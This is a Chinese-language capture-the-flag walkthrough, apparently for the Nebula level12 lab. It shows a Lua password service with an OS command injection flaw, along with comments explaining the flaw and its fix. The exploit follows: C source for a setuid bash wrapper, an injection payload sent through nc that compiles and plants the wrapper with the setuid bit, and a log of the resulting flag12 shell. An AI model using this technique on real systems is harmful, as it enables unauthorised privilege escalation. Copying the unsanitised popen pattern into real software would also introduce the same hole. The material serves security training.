程序源碼爲 Lua 腳本,在 127.0.0.1:50001 上監聽並校驗用戶提交的口令:
local socket = require("socket")
-- Listen on the loopback address only (port 50001); assert raises if the bind fails.
local server = assert(socket.bind("127.0.0.1", 50001))
--- Return the first 40 characters of sha1sum's output for `password`.
-- The digest is computed by running "echo <password> | sha1sum" through
-- io.popen, which executes the string via the system shell.
-- NOTE(security): `password` is concatenated into that command line with no
-- quoting or validation, so shell metacharacters in it are interpreted by the
-- shell (OS command injection, CWE-78). The only caller visible in this file
-- passes the raw line received from the network client. The robust fix is to
-- compute SHA-1 in-process with a hashing library so that untrusted input
-- never reaches a shell.
-- NOTE(review): `prog` and `data` are assigned without `local`, so they are
-- globals.
-- @param password string to hash (untrusted when it comes from the socket)
-- @return the first 40 characters read from the pipe
function hash(password)
-- Untrusted data is spliced directly into the shell command here.
-- echo normally appends a newline, so the digest covers password .. "\n".
prog = io.popen("echo "..password.." | sha1sum", "r")
data = prog:read("*all")
prog:close()
-- sha1sum prints the hex digest followed by a file name field; keep only the
-- 40 hex characters.
data = string.sub(data, 1, 40)
return data
end
-- Accept loop: serves one client at a time and never exits.
while 1 do
local client = server:accept()
client:send("Password: ")
-- Give the client up to 60 seconds for the socket operations that follow.
client:settimeout(60)
-- Read one line from the client; its content is fully attacker-controlled.
local line, err = client:receive()
if not err then
-- NOTE(security): the submitted password is written to stdout in clear text.
print("trying " .. line) -- log from where ;\
-- NOTE(security): `line` is passed to hash() without validation, and hash()
-- places it on a shell command line.
local h = hash(line)
-- Compare against a hard-coded 40-character hex digest.
if h ~= "4754a4f4bd5787accd33de887b9250a0691dd198" then
client:send("Better luck next time\n");
else
client:send("Congrats, your token is 413**CARRIER LOST**\n")
end
end
client:close()
end
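hash() 把 password 未經任何過濾或引用就拼接進交給 io.popen 執行的 shell 命令,因此可以對 password 進行命令注入(修復方法是在進程內計算 SHA-1,不讓不可信輸入進入 shell 命令行):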
1. 在/tmp目錄下創建shell.c:
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <stdio.h>
/*
 * Set the real, effective and saved group and user IDs to the process's
 * current effective IDs, then start /bin/bash through system().
 * When the binary carries the setuid/setgid bits, the effective IDs are the
 * file owner's, so the spawned shell runs under that account.
 * argc, argv and envp are unused.
 * NOTE(review): the return values of setresgid(), setresuid() and system()
 * are not checked, and main has no return statement.
 */
int main(int argc, char **argv, char **envp)
{
gid_t gid;
uid_t uid;
/* Read the effective IDs, which a setuid/setgid bit takes from the file owner. */
gid = getegid();
uid = geteuid();
/* Group first, then user: both are set for real, effective and saved IDs. */
setresgid(gid, gid, gid);
setresuid(uid, uid, uid);
system("/bin/bash");
}
2. 參數注入:
level12@nebula:/tmp$ nc localhost 50001
Password: 1; gcc -o /tmp/shell /tmp/shell.c; cp /tmp/shell /home/flag12; chmod +s /home/flag12/shell echo 1
3. 然後運行/home/flag12/shell即可:
level12@nebula:/tmp$ cd /home/flag12
level12@nebula:/home/flag12$ ls -l
total 9
-rw-r--r-- 1 root root 685 2011-11-20 21:22 flag12.lua
-rwsr-sr-x 1 flag12 flag12 7321 2016-12-29 19:54 shell
level12@nebula:/home/flag12$ date
Thu Dec 29 19:55:36 PST 2016
level12@nebula:/home/flag12$ ./shell
flag12@nebula:/home/flag12$